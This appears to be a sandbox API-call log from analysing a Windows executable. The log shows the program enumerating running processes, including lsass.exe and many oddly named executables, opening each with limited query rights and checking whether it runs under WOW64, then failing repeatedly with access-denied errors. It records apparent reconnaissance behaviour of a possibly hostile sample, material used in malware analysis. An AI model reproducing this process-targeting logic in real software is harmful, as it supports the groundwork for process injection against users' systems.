	[0072.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dcb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.621] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.621] CloseHandle (hObject=0x224) returned 1
	[0072.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.622] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.622] CloseHandle (hObject=0x224) returned 1
	[0072.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7289f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.622] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.622] CloseHandle (hObject=0x224) returned 1
	[0072.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.622] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.622] CloseHandle (hObject=0x224) returned 1
	[0072.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.623] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.623] CloseHandle (hObject=0x224) returned 1
	[0072.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.623] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.623] CloseHandle (hObject=0x224) returned 1
	[0072.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.623] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.623] CloseHandle (hObject=0x224) returned 1
	[0072.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.625] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.625] CloseHandle (hObject=0x224) returned 1
	[0072.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.625] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.625] CloseHandle (hObject=0x224) returned 1
	[0072.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.625] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.625] CloseHandle (hObject=0x224) returned 1
	[0072.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.625] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.625] CloseHandle (hObject=0x224) returned 1
	[0072.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728a58, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.626] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.626] CloseHandle (hObject=0x224) returned 1
	[0072.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7288f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.626] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.626] CloseHandle (hObject=0x224) returned 1
	[0072.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.626] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.626] CloseHandle (hObject=0x224) returned 1
	[0072.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728a38, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.627] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.627] CloseHandle (hObject=0x224) returned 1
	[0072.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eb08, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.627] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.627] CloseHandle (hObject=0x224) returned 1
	[0072.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.627] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.627] CloseHandle (hObject=0x224) returned 1
	[0072.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.628] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.628] CloseHandle (hObject=0x224) returned 1
	[0072.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.628] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.628] CloseHandle (hObject=0x224) returned 1
	[0072.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a18, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.628] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.628] CloseHandle (hObject=0x224) returned 1
	[0072.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7289b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.629] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.629] CloseHandle (hObject=0x224) returned 1
	[0072.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.629] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.629] CloseHandle (hObject=0x224) returned 1
	[0072.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.629] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.629] CloseHandle (hObject=0x224) returned 1
	[0072.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.629] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.629] CloseHandle (hObject=0x224) returned 1
	[0072.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.629] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.629] CloseHandle (hObject=0x224) returned 1
	[0072.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.630] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.630] CloseHandle (hObject=0x224) returned 1
	[0072.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728998, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.630] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.630] CloseHandle (hObject=0x224) returned 1
	[0072.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.630] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.630] CloseHandle (hObject=0x224) returned 1
	[0072.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.630] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.630] CloseHandle (hObject=0x224) returned 1
	[0072.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e8d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.631] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.631] CloseHandle (hObject=0x224) returned 1
	[0072.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.631] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.631] CloseHandle (hObject=0x224) returned 1
	[0072.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.631] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
	[0072.632] GetLastError () returned 0x5
